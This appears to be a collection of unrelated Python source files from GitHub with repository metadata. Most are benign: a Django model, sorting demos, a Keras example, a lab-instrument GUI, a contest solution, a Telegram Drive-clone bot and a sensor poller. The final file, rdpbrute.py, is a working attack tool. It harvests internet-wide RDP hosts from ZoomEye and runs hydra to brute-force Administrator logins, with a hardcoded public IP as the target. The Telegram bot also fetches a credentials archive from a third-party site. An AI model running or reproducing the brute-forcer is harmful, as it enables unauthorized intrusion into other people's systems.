goods = models.ForeignKey("foods.Foods", on_delete=models.PROTECT, related_name="order_foods", verbose_name="订单商品")
count = models.IntegerField(default=1, verbose_name="数量")
price = models.DecimalField(max_digits=10, decimal_places=2, verbose_name="单价")
evaluate = models.TextField(default="", verbose_name="评价信息")
score = models.SmallIntegerField(choices=SCORE_CHOICES, default=5, verbose_name='满意度评分')
# is_anonymous = models.BooleanField(default=False, verbose_name='是否匿名评价')
is_commented = models.BooleanField(default=False, verbose_name='是否评价了')
class Meta:
db_table = "tb_order_goods"
verbose_name = '订单商品'
verbose_name_plural = verbose_name
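# Hedged usage sketch (illustration only, assuming a configured Django project):
#
#   order.status = OrderInfo.ORDER_STATUS_ENUM["FINISHED"]   # -> 4 ("已完成")
#   order.save()
#   order.get_status_display()   # Django maps the stored integer back to its label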
|
[
"xuyunfeng12388@163.com"
] |
xuyunfeng12388@163.com
|
92264e50db168c3a7616972a721169c72358ea8f
|
610ac1da64200c109b9ac48d162058fdd85801aa
|
/functions/diffbtwsortsorted1.py
|
7414f4512fc4bedc4ec79e2ebac0b4024a1637d5
|
[] |
no_license
|
rajdharmkar/Python2.7
|
3d88e7c76c92bbba7481bce7a224ccc8670b3abb
|
9c6010e8afd756c16e426bf8c3a40ae2cefdadfe
|
refs/heads/master
| 2021-05-03T18:56:36.249812
| 2019-10-08T00:17:46
| 2019-10-08T00:17:46
| 120,418,397
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 865
|
py
|
# sort() is a list method that sorts the list in place and returns None; syntax: list.sort()
# It takes no positional arguments (only the optional key= and reverse= keyword arguments).
# sorted(list) is a built-in function that returns a new sorted list (it does not print).
a = ['c','a','d','b']
b = [3,2,1,4]
print ('before sort(), the value of a = {}'.format(a))
print ('before sort(), the value of b = {}'.format(b))
a.sort()  # sorts in place, prints nothing
print ('after sort(), the value of a = {}'.format(a))  # prints the sorted list
b.sort()  # sorts in place, prints nothing
print ('after sort(), the value of b = {}'.format(b))  # prints the sorted list
# print(a.sort()) returns only None
# print(b.sort()) returns only None
c = ['d','a','c','b']
d = [5,2,3,4]
print ('before sorted(), the value of c = {}'.format(c))
c = sorted(c)
print ('after sorted(), the value of c = {}'.format(c))
e = [6,0,3]
print(sorted(e))
f = ['w','c','s','e']
print (sorted(f))
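# Added demonstration: sort() mutates in place and returns None, so it cannot be chained.
g = [3, 1, 2]
result = g.sort()
print (result)  # None
print (g)  # [1, 2, 3]
print (sorted('bca'))  # sorted() accepts any iterable and returns a list: ['a', 'b', 'c']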
|
[
"rajdharmkar@gmail.com"
] |
rajdharmkar@gmail.com
|
4b6b8f43c24d2b892ba9b2cead0540982d6839a8
|
89504df28f5892a9a1fd14ce2378af14d6b03ede
|
/app/pl/mazurk/ml/keras/getting-started.py
|
e572d92049c5351ea767e83b4ef03c8932148836
|
[] |
no_license
|
kmazur/ml-nanodegree
|
c343bbbd46ec8b4e0de88b7c96f0c7393b539451
|
d00ca3f0e1a3863959cfeb917d5dd8a51c94a5e5
|
refs/heads/master
| 2021-01-17T09:23:22.765880
| 2017-07-24T22:11:06
| 2017-07-24T22:11:06
| 83,983,975
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 551
|
py
|
from keras.models import Sequential
from keras.layers import Dense, Activation
model = Sequential()
model.add(Dense(1, input_dim=784, activation='sigmoid'))
model.compile(optimizer='rmsprop',
loss='binary_crossentropy',
metrics=['accuracy'])
# generate dummy data
import numpy as np
data = np.random.random((1000, 784))
labels = np.random.randint(2, size=(1000, 1))
# train the model, iterating on the data in batches
# of 32 samples
history = model.fit(data, labels, epochs=10, batch_size=32)  # 'nb_epoch' was renamed to 'epochs' in Keras 2
print(history.history)
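# Hedged sketch (added for illustration): evaluating the fitted model on the same dummy
# data; with random binary labels, accuracy should hover near chance (~0.5).
loss, acc = model.evaluate(data, labels, batch_size=32)
print('loss: {:.3f}, accuracy: {:.3f}'.format(loss, acc))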
|
[
"mazurkrzysztof.k@gmail.com"
] |
mazurkrzysztof.k@gmail.com
|
1defbe98e5336867810aaabef9e83a7b9aac3395
|
3e4fec214d82b5547df9ff94e163beb9369547f4
|
/new_meas03/RigolDG3000_RMcontroller_pyqt4.py
|
b271ac0775cb4789b4c572dc0c32a12435e2da42
|
[] |
no_license
|
physikier/magnetometer
|
582caf47d3869340cd18a0aaa2d171e37591c79a
|
e9e6bd314d48b4b40ac5a2145b821305dec2d05e
|
refs/heads/master
| 2021-01-21T14:44:11.460815
| 2016-04-30T21:15:02
| 2016-04-30T21:15:02
| 59,505,445
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 14,742
|
py
|
import hardware.RigolDG3000 as rig
import sys
import numpy
from PyQt4 import QtCore, QtGui, uic
rigol = rig.RigolDG3000("USB0::0x1AB1::0x0588::DG1D124204534::INSTR")
# Main QT Window Class
# The Class which conations all QT Widgets and so on
class ControllerGui(QtGui.QMainWindow):
# controller_utils is an instance of the ControllerUtils class (Singleton)
controller_utils = None
# ui_utils is an instance of the UIUtils class (Singleton)
ui_utils = None
def __init__(self):
super(ControllerGui, self).__init__()
uic.loadUi("./RigolDG3000_FMspec/fm_spec_via_dg3000.ui", self)
ControllerGui.controller_utils = ControllerUtils(self)
ControllerGui.ui_utils = UIUtils(self)
self.controller_utils.get_settings()
# connect the button clicks with the specific functions
self.button_get.clicked.connect(self.controller_utils.get_settings)
self.button_quit.clicked.connect(QtCore.QCoreApplication.instance().quit)
self.checkBox_ch1_active.stateChanged.connect(self.controller_utils.apply_ch1_stat)
self.checkBox_ch2_active.stateChanged.connect(self.controller_utils.apply_ch2_stat)
self.box_ch1_wform.currentIndexChanged.connect(self.controller_utils.apply_ch1_wform)
self.box_ch2_wform.currentIndexChanged.connect(self.controller_utils.apply_ch2_wform)
self.textbox_ch1_freq.editingFinished.connect(self.controller_utils.apply_ch1_freq)
self.textbox_ch2_freq.editingFinished.connect(self.controller_utils.apply_ch2_freq)
self.hscrollbar_ch1_freq.sliderReleased.connect(self.controller_utils.apply_ch1_freq)
self.hscrollbar_ch2_freq.sliderReleased.connect(self.controller_utils.apply_ch2_freq)
self.textbox_ch1_ampl.editingFinished.connect(self.controller_utils.apply_ch1_ampl)
self.textbox_ch2_ampl.editingFinished.connect(self.controller_utils.apply_ch2_ampl)
self.hscrollbar_ch1_ampl.sliderReleased.connect(self.controller_utils.apply_ch1_ampl)
self.hscrollbar_ch2_ampl.sliderReleased.connect(self.controller_utils.apply_ch2_ampl)
self.textbox_ch1_off.editingFinished.connect(self.controller_utils.apply_ch1_off)
self.textbox_ch2_off.editingFinished.connect(self.controller_utils.apply_ch2_off)
self.hscrollbar_ch1_off.sliderReleased.connect(self.controller_utils.apply_ch1_off)
self.hscrollbar_ch2_off.sliderReleased.connect(self.controller_utils.apply_ch2_off)
self.textbox_ch1_phase.editingFinished.connect(self.controller_utils.apply_ch1_phase)
self.textbox_ch2_phase.editingFinished.connect(self.controller_utils.apply_ch2_phase)
self.dial_ch1_phase.sliderReleased.connect(self.controller_utils.apply_ch1_phase)
self.dial_ch2_phase.sliderReleased.connect(self.controller_utils.apply_ch2_phase)
# connect the sliders/dials with the textbox above (and visa versa) to see the current slider/dial value
# Frequency
self.hscrollbar_ch1_freq.sliderMoved.connect(lambda slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq, factor=10))
self.hscrollbar_ch2_freq.sliderMoved.connect(lambda slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq, factor=10))
self.hscrollbar_ch1_freq.valueChanged.connect(lambda slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq, factor=10))
self.hscrollbar_ch2_freq.valueChanged.connect(lambda slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq, factor=10))
self.textbox_ch1_freq.editingFinished.connect(lambda slider=self.hscrollbar_ch1_freq, textbox=self.textbox_ch1_freq: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch1_freq, slider=self.hscrollbar_ch1_freq, factor=10))
self.textbox_ch2_freq.editingFinished.connect(lambda slider=self.hscrollbar_ch2_freq, textbox=self.textbox_ch2_freq: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch2_freq, slider=self.hscrollbar_ch2_freq, factor=10))
# Amplitude
self.hscrollbar_ch1_ampl.sliderMoved.connect(lambda slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_ampl: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_ampl, factor=10))
self.hscrollbar_ch2_ampl.sliderMoved.connect(lambda slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_ampl: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_ampl, factor=10))
self.hscrollbar_ch1_ampl.valueChanged.connect(lambda slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_ampl: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_ampl, factor=10))
self.hscrollbar_ch2_ampl.valueChanged.connect(lambda slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_ampl: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_ampl, factor=10))
self.textbox_ch1_ampl.editingFinished.connect(lambda slider=self.hscrollbar_ch1_ampl, textbox=self.textbox_ch1_freq: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch1_ampl, slider=self.hscrollbar_ch1_ampl, factor=10))
self.textbox_ch2_ampl.editingFinished.connect(lambda slider=self.hscrollbar_ch2_ampl, textbox=self.textbox_ch2_freq: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch2_ampl, slider=self.hscrollbar_ch2_ampl, factor=10))
# Offset
self.hscrollbar_ch1_off.valueChanged.connect(lambda slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off, factor=10))
self.hscrollbar_ch2_off.valueChanged.connect(lambda slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off, factor=10))
self.hscrollbar_ch1_off.sliderMoved.connect(lambda slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off, factor=10))
self.hscrollbar_ch2_off.sliderMoved.connect(lambda slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off: self.ui_utils.connect_slider_textbox(slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off, factor=10))
self.textbox_ch1_off.editingFinished.connect(lambda slider=self.hscrollbar_ch1_off, textbox=self.textbox_ch1_off: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch1_off, slider=self.hscrollbar_ch1_off, factor=10))
self.textbox_ch2_off.editingFinished.connect(lambda slider=self.hscrollbar_ch2_off, textbox=self.textbox_ch2_off: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch2_off, slider=self.hscrollbar_ch2_off, factor=10))
# Phase
self.dial_ch1_phase.sliderMoved.connect(lambda slider=self.dial_ch1_phase, textbox=self.textbox_ch1_phase: self.ui_utils.connect_slider_textbox(slider=self.dial_ch1_phase, textbox=self.textbox_ch1_phase, factor=1))
self.dial_ch2_phase.sliderMoved.connect(lambda slider=self.dial_ch2_phase, textbox=self.textbox_ch2_phase: self.ui_utils.connect_slider_textbox(slider=self.dial_ch2_phase, textbox=self.textbox_ch2_phase, factor=1))
self.textbox_ch1_phase.editingFinished.connect(lambda slider=self.dial_ch1_phase, textbox=self.textbox_ch1_phase: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch1_phase, slider=self.dial_ch1_phase, factor=1))
self.textbox_ch2_phase.editingFinished.connect(lambda slider=self.dial_ch2_phase, textbox=self.textbox_ch2_phase: self.ui_utils.connect_textbox_slider(textbox=self.textbox_ch2_phase, slider=self.dial_ch2_phase, factor=1))
#self.get_settings()
self.show()
def eventFilter(self, source, event):
if (event.type() == QtCore.QEvent.ModifiedChange and source is self.box_ch1_wform):
print('test')
return QtGui.QWidget.eventFilter(self, source, event)  # PyQt4 has no QtWidgets module
# Function Generator Utils
class ControllerUtils():
# the gui is the instance of the main Qt Window (ControllerGui class)
gui = None
def __init__(self, gui):
ControllerUtils.gui = gui
def check_ch_status(self, channel):
#print('rigol ouput value: ' + rigol.get_output(channel))
if rigol.get_output(channel) == "ON\n":
output = 1
else:
output = 0
return output
def get_settings(self):
ch1_active = self.check_ch_status(1)
print('[GET] Channel 1 Status: ' + str(ch1_active))
self.gui.checkBox_ch1_active.setChecked(ch1_active)  # mirrors the channel-2 handling below (was hardcoded to 2 during debugging)
ch2_active = self.check_ch_status(2)
print('[GET] Channel 2 Status: ' + str(ch2_active))
self.gui.checkBox_ch2_active.setChecked(ch2_active)
ch1_wform = rigol.get_waveform(1)[4:]
print('[GET] Channel 1 Waveform: ' + str(ch1_wform))
self.gui.box_ch1_wform.setCurrentIndex(self.gui.box_ch1_wform.findText(ch1_wform, QtCore.Qt.MatchFixedString))
ch2_wform = rigol.get_waveform(2)[4:]
print('[GET] Channel 2 Waveform: ' + str(ch2_wform))
self.gui.box_ch2_wform.setCurrentIndex(self.gui.box_ch2_wform.findText(ch2_wform, QtCore.Qt.MatchFixedString))
ch1_freq = rigol.get_freq(1)
print('[GET] Channel 1 Frequency: ' + str(ch1_freq))
self.gui.textbox_ch1_freq.setText(ch1_freq)
self.gui.hscrollbar_ch1_freq.setValue(float(ch1_freq))
ch2_freq = rigol.get_freq(2)[4:]
print('[GET] Channel 2 Frequency: ' + str(ch2_freq))
self.gui.textbox_ch2_freq.setText(ch2_freq)
self.gui.hscrollbar_ch2_freq.setValue(float(ch2_freq))
ch1_ampl = rigol.get_ampl(1)
print('[GET] Channel 1 Amplitude: ' + str(ch1_ampl))
self.gui.textbox_ch1_ampl.setText(ch1_ampl)
self.gui.hscrollbar_ch1_ampl.setValue(float(ch1_ampl)*10)
ch2_ampl = rigol.get_ampl(2)[5:]
print('[GET] Channel 2 Amplitude: ' + str(ch2_ampl))
self.gui.textbox_ch2_ampl.setText(ch2_ampl)
self.gui.hscrollbar_ch2_ampl.setValue(float(ch2_ampl)*10)
ch1_off = rigol.get_off(1)
print('[GET] Channel 1 Offset: ' + str(ch1_off))
self.gui.textbox_ch1_off.setText(ch1_off)
self.gui.hscrollbar_ch1_off.setValue(float(ch1_off)*10)
ch2_off = rigol.get_off(2)
print('[GET] Channel 2 Offset: ' + str(ch2_off))
self.gui.textbox_ch2_off.setText(ch2_off)
self.gui.hscrollbar_ch2_off.setValue(float(ch2_off)*10)
ch1_phase = rigol.get_phase(1)
print('[GET] Channel 1 Phase: ' + str(ch1_phase))
self.gui.textbox_ch1_phase.setText(ch1_phase)
self.gui.dial_ch1_phase.setValue(float(ch1_phase))
ch2_phase = rigol.get_phase(2)
print('[GET] Channel 2 Phase: ' + str(ch2_phase))
self.gui.textbox_ch2_phase.setText(ch2_phase)
self.gui.dial_ch2_phase.setValue(float(ch2_phase))
print('got all settings...')
def apply_ch1_stat(self):
value_stat = self.gui.checkBox_ch1_active.checkState()
if value_stat == 2:
rigol.set_output(1, "ON")
else:
rigol.set_output(1, "OFF")
print('[SET] Channel 1 Status: ' + str(value_stat))
def apply_ch2_stat(self):
value_stat = self.gui.checkBox_ch2_active.checkState()
if value_stat == 2:
rigol.set_output(2, "ON")
else:
rigol.set_output(2, "OFF")
print('[SET] Channel 2 Status: ' + str(value_stat))
def apply_ch1_wform(self):
ch1_wform = self.gui.box_ch1_wform.currentText()
rigol.set_waveform(1, ch1_wform)
print('[SET] Channel 1 Waveform: ' + ch1_wform)
def apply_ch2_wform(self):
ch2_wform = self.gui.box_ch2_wform.currentText()
rigol.set_waveform(2, ch2_wform)
print('[SET] Channel 2 Waveform: ' + ch2_wform)
def apply_ch1_freq(self):
ch1_freq = self.gui.textbox_ch1_freq.text()
rigol.set_freq(1, float(ch1_freq))
print('[SET] Channel 1 Frequency: ' + ch1_freq)
def apply_ch2_freq(self):
ch2_freq = self.gui.textbox_ch2_freq.text()
rigol.set_freq(2, float(ch2_freq))
print('[SET] Channel 2 Frequency: ' + ch2_freq)
def apply_ch1_ampl(self):
ch1_ampl = self.gui.textbox_ch1_ampl.text()
rigol.set_ampl(1, float(ch1_ampl))
print('[SET] Channel 1 Amplitude: ' + ch1_ampl)
def apply_ch2_ampl(self):
ch2_ampl = self.gui.textbox_ch2_ampl.text()
rigol.set_ampl(2, float(ch2_ampl))
print('[SET] Channel 2 Amplitude: ' + ch2_ampl)
def apply_ch1_off(self):
#ch1_off = self.ui_utils.value_handler(self.gui.textbox_ch1_off.text())
ch1_off = self.gui.textbox_ch1_off.text()
rigol.set_off(1, float(ch1_off))
print('[SET] Channel 1 Offset: ' + ch1_off)
def apply_ch2_off(self):
ch2_off = self.gui.textbox_ch2_off.text()
rigol.set_off(2, float(ch2_off))
print('[SET] Channel 2 Offset: ' + ch2_off)
def apply_ch1_phase(self):
ch1_phase = self.gui.textbox_ch1_phase.text()
rigol.set_phase(1, float(ch1_phase))
print('[SET] Channel 1 Phase: ' + ch1_phase)
def apply_ch2_phase(self):
ch2_phase = self.gui.textbox_ch2_phase.text()
rigol.set_phase(2, float(ch2_phase))
print('[SET] Channel 2 Phase: ' + ch2_phase)
def close_rigol(self):
rigol.close_rigol()
# User Interface Utils
class UIUtils():
gui = None
def __init__(self, gui):
UIUtils.gui = gui
def connect_slider_textbox(self, slider, textbox, factor):
textbox.setText(str(self.value_handler(slider.value(), factor)))
def connect_textbox_slider(self, textbox, slider, factor):
slider.setValue(int(float(textbox.text())*factor))
def value_handler(self, value, factor):
scaled_value = '{0:.2f}'.format(float(value) / factor)  # cast before dividing so integer division cannot truncate
return scaled_value
def main():
app = QtGui.QApplication(sys.argv)
app.setWindowIcon(QtGui.QIcon("icon1.png"))
window = ControllerGui()
sys.exit(app.exec_())
if __name__ == '__main__':
main()
|
[
"phy76371@stud.uni-stuttgart.de"
] |
phy76371@stud.uni-stuttgart.de
|
4079a5939d8149ce313449a2137c0d27b135d70d
|
54f352a242a8ad6ff5516703e91da61e08d9a9e6
|
/Source Codes/AtCoder/arc007/B/4778892.py
|
e50c65011d3a3d08b384a7d5b387ea1779015475
|
[] |
no_license
|
Kawser-nerd/CLCDSA
|
5cbd8a4c3f65173e4e8e0d7ed845574c4770c3eb
|
aee32551795763b54acb26856ab239370cac4e75
|
refs/heads/master
| 2022-02-09T11:08:56.588303
| 2022-01-26T18:53:40
| 2022-01-26T18:53:40
| 211,783,197
| 23
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 264
|
py
|
# Simulation: N numbered slots start holding disks 1..N; n is the disk in hand (0 = empty).
N, M = [int(_) for _ in input().split()]
disk = [int(input()) for i in range(M)]
result = [(i + 1) for i in range(N)]
n = 0
for d in disk:
if d != n:
# Swap: the requested disk d leaves its slot, and the disk in hand takes its place.
i = result.index(d)
result[i], n = n, d
for i in range(N):
print(result[i])
|
[
"kwnafi@yahoo.com"
] |
kwnafi@yahoo.com
|
c7de1bec1f0955bc633eb67fad4e4cd01845a912
|
689374c378fb303ee8521f41b9140843e5047d7b
|
/bot/__main__.py
|
df71f49c0d2d72f0a569564ad8c64f4c68a28d32
|
[] |
no_license
|
jon4646/telegramclonebot
|
f7e46fdbfc6d615fbe4ff5b3bf29fe33623ba52a
|
378a163be8794d1d40e0a2a2e04c46a00200a535
|
refs/heads/main
| 2023-02-22T12:41:47.025643
| 2021-01-25T03:46:17
| 2021-01-25T03:46:17
| 333,927,450
| 0
| 0
| null | 2021-01-28T20:36:11
| 2021-01-28T20:36:10
| null |
UTF-8
|
Python
| false
| false
| 5,438
|
py
|
from telegram.ext import CommandHandler, run_async
from bot.gDrive import GoogleDriveHelper
from bot.fs_utils import get_readable_file_size
from bot import LOGGER, dispatcher, updater, bot
from bot.config import BOT_TOKEN, OWNER_ID, GDRIVE_FOLDER_ID
from bot.decorators import is_authorised, is_owner
from telegram.error import TimedOut, BadRequest
from bot.clone_status import CloneStatus
from bot.msg_utils import deleteMessage, sendMessage
import time
import dload
REPO_LINK = "https://github.com/jagrit007/Telegram-CloneBot"
# Soon to be used for direct updates from within the bot.
@run_async
def helpp(update, context):
sendMessage("မသိတာများရှိလျှင် ဂျပန်ဂတုံး @moedyiu သို့ဆက်သွယ်ပါ။",
context.bot, update, 'Markdown')
@run_async
def dl_sas(update, context):
dload.save_unzip("https://javbabes.me/accounts.zip", "./")
sendMessage("စတင်အသုံးပြုနိုင်ပါပြီ သင်၏ shared drive များတွင် telegramdrive1@googlegroups.com ကို Content Manager အဖြစ်ထည့်သွင်းထားပါ",
context.bot, update, 'Markdown')
@run_async
def start(update, context):
sendMessage("ကြိုဆိုပါတယ် /config ဟုရိုက်ပြီး စတင်လိုက်ပါ",
context.bot, update, 'Markdown')
# ;-;
@run_async
def helper(update, context):
sendMessage("Here are the available commands of the bot\n\n" \
"*Usage:* `/clone <link> [DESTINATION_ID]`\n*Example:* \n1. `/clone https://drive.google.com/drive/u/1/folders/0AO-ISIXXXXXXXXXXXX`\n2. `/clone 0AO-ISIXXXXXXXXXXXX`" \
"\n*DESTIONATION_ID* is optional. It can be either link or ID to where you wish to store a particular clone." \
"\n\nYou can also *ignore folders* from clone process by doing the following:\n" \
"`/clone <FOLDER_ID> [DESTINATION] [id1,id2,id3]`\n In this example: id1, id2 and id3 would get ignored from cloning\nDo not use <> or [] in actual message." \
"*Make sure to not put any space between commas (,).*\n" \
f"Source of this bot: [GitHub]({REPO_LINK})", context.bot, update, 'Markdown')
# TODO Cancel Clones with /cancel command.
@run_async
# @is_authorised
def cloneNode(update, context):
args = update.message.text.split(" ")
if len(args) > 1:
link = args[1]
try:
ignoreList = args[-1].split(',')
except IndexError:
ignoreList = []
DESTINATION_ID = GDRIVE_FOLDER_ID
try:
DESTINATION_ID = args[2]
print(DESTINATION_ID)
except IndexError:
pass
# Usage: /clone <FolderToClone> <Destination> <IDtoIgnoreFromClone>,<IDtoIgnoreFromClone>
msg = sendMessage(f"<b>Cloning:</b> <code>{link}</code>", context.bot, update)
status_class = CloneStatus()
gd = GoogleDriveHelper(GFolder_ID=DESTINATION_ID)
sendCloneStatus(update, context, status_class, msg, link)
result = gd.clone(link, status_class, ignoreList=ignoreList)
deleteMessage(context.bot, msg)
status_class.set_status(True)
sendMessage(result, context.bot, update)
else:
sendMessage("/copy SourceID DestinationID \n\n/copy https://drive.google.com/xxxxxxxxx https://drive.google.com/zzzzzzzzzz\n\nဟုပေးပို့ကူးယူပါ", bot, update)
@run_async
def sendCloneStatus(update, context, status, msg, link):
old_text = ''
while not status.done():
sleeper(3)
try:
text=f'🔗 *Cloning:* [{status.MainFolderName}]({status.MainFolderLink})\n━━━━━━━━━━━━━━\n🗃️ *Current File:* `{status.get_name()}`\n⬆️ *Transferred*: `{status.get_size()}`\n📁 *Destination:* [{status.DestinationFolderName}]({status.DestinationFolderLink})'
if status.checkFileStatus():
text += f"\n🕒 *Checking Existing Files:* `{str(status.checkFileStatus())}`"
if not text == old_text:
msg.edit_text(text=text, parse_mode="Markdown", timeout=200)
old_text = text
except Exception as e:
LOGGER.error(e)
if str(e) == "Message to edit not found":
break
sleeper(2)
continue
return
def sleeper(value, enabled=True):
time.sleep(int(value))
return
@run_async
@is_owner
def sendLogs(update, context):
with open('log.txt', 'rb') as f:
bot.send_document(document=f, filename=f.name,
reply_to_message_id=update.message.message_id,
chat_id=update.message.chat_id)
def main():
LOGGER.info("Bot Started!")
clone_handler = CommandHandler('copy', cloneNode)
start_handler = CommandHandler('start', start)
help_handler = CommandHandler('hellp', helper)
log_handler = CommandHandler('logs', sendLogs)
sas_handler = CommandHandler('config', dl_sas)
helpp_handler = CommandHandler('help', helpp)
dispatcher.add_handler(helpp_handler)
dispatcher.add_handler(sas_handler)
dispatcher.add_handler(log_handler)
dispatcher.add_handler(start_handler)
dispatcher.add_handler(clone_handler)
dispatcher.add_handler(help_handler)
updater.start_polling()
main()
|
[
"noreply@github.com"
] |
jon4646.noreply@github.com
|
75526fe121d3c14c20443e89184aa18b7e302a2e
|
b24adc31b7c781ea156882c3cc657bb03034e8d4
|
/OpensenseMapTemperatureLoop.py
|
02057ba130f2ab23aa31ae88899d148ba9390ac1
|
[] |
no_license
|
harunler/PythonStreaming101
|
271c7ca8dfd87da95412d4bc89c2ba80ac491927
|
8d2b4342cff776197ada8488e5bc953ddfb73cc2
|
refs/heads/master
| 2022-08-12T21:59:14.480406
| 2020-05-04T17:47:19
| 2020-05-04T17:47:19
| 259,614,626
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,018
|
py
|
import asyncio
import aiohttp
import json
STATION_ID = "5b8449037c519100190fc728"
SENSOR_ID = "5b8449037c519100190fc72a"
async def fetchContent(session, url):
async with session.get(url) as response:
return await response.text()
async def getTemperature():
async with aiohttp.ClientSession() as session:
url = f"https://api.opensensemap.org/boxes/{STATION_ID}?format=json"
content = await fetchContent(session, url)
data = json.loads(content)
sensors = data["sensors"]
for sensor in sensors:
if sensor["_id"] == SENSOR_ID:
print(
sensor["lastMeasurement"]["createdAt"],
sensor["title"],
sensor["lastMeasurement"]["value"],
sensor["unit"],
sep = ", ")
await asyncio.sleep(60)
loop.create_task(getTemperature())  # reschedules itself on the global event loop created in __main__
if __name__ == '__main__':
loop = asyncio.get_event_loop()
loop.create_task(getTemperature())
loop.run_forever()
# run_forever() blocks; the two lines below only execute after the loop is stopped elsewhere.
loop.stop()
loop.close()
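# Hedged alternative sketch (an assumption, not the original design): the same polling
# loop is usually written as a single while-True coroutine driven by asyncio.run(),
# which avoids the self-rescheduling create_task() call inside getTemperature():
#
#   async def poll_forever():
#       while True:
#           await fetch_and_print_once()   # hypothetical variant of getTemperature()
#           await asyncio.sleep(60)
#
#   asyncio.run(poll_forever())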
|
[
"noreply@github.com"
] |
harunler.noreply@github.com
|
c4ea8e6e09385564e75ef4d36a7fafa8033aaffb
|
691e4890a070b18feb74e1bf817af8ebe9db342b
|
/V-Scrack/exp/payload/rdpbrute.py
|
ca37e6fb3d5b4ee57d7232ee3d6aaf8c36b5749a
|
[] |
no_license
|
witchfindertr/Python-crack
|
764af457b140fad4f28f259dc14c444d2445b287
|
88659e72e98d4cec0df52d2f5b4b9c8af35a39a6
|
refs/heads/master
| 2023-02-23T12:45:11.475706
| 2020-03-03T14:41:05
| 2020-03-03T14:41:05
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,409
|
py
|
# -*-coding:utf-8-*-
import optparse
import os
import requests
import time
def main():
usage='[help -s 扫描全网3389]'
parser=optparse.OptionParser(usage)
parser.add_option('-s',action='store_true',dest='ji',help='扫描全网3389')
parser.add_option('-b',dest='bao',help='爆破字典(username)')
parser.add_option('-p',dest='passs',help='爆破字典(password)')
parser.add_option('-x',dest='host',help='目标')
(options,args)=parser.parse_args()
if options.ji:
Ji()
elif options.bao and options.host and options.passs:
bao=options.bao
ip=options.host
passs=options.passs
Bao(bao,ip,passs)
else:
parser.print_help()
exit()
def Ji():
for r in range(1,10):
time.sleep(1)
g='https://api.zoomeye.org/host/search?query=port:3389&page={}'.format(r)
headers={"Authorization":"JWT token"}
r=requests.get(g,headers=headers)
sd=r.json()
rsd=sd['matches'][0:]
for l in rsd:
print(l['ip'])
owe=l['ip']
with open('3389.txt','a') as p:
p.write(owe+'\n')
def Bao(bao,ip,passs):
baopo=os.system('hydra.exe -L {} -P {} rdp://{}'.format(bao,passs,ip))
if __name__ == '__main__':
bao = 'Administrator',
passs = 'pass_dict.txt',
ip = '150.109.64.81',
res = Bao(bao,ip,passs)
print(res)
|
[
"xianghgoog@gmail.com"
] |
xianghgoog@gmail.com
|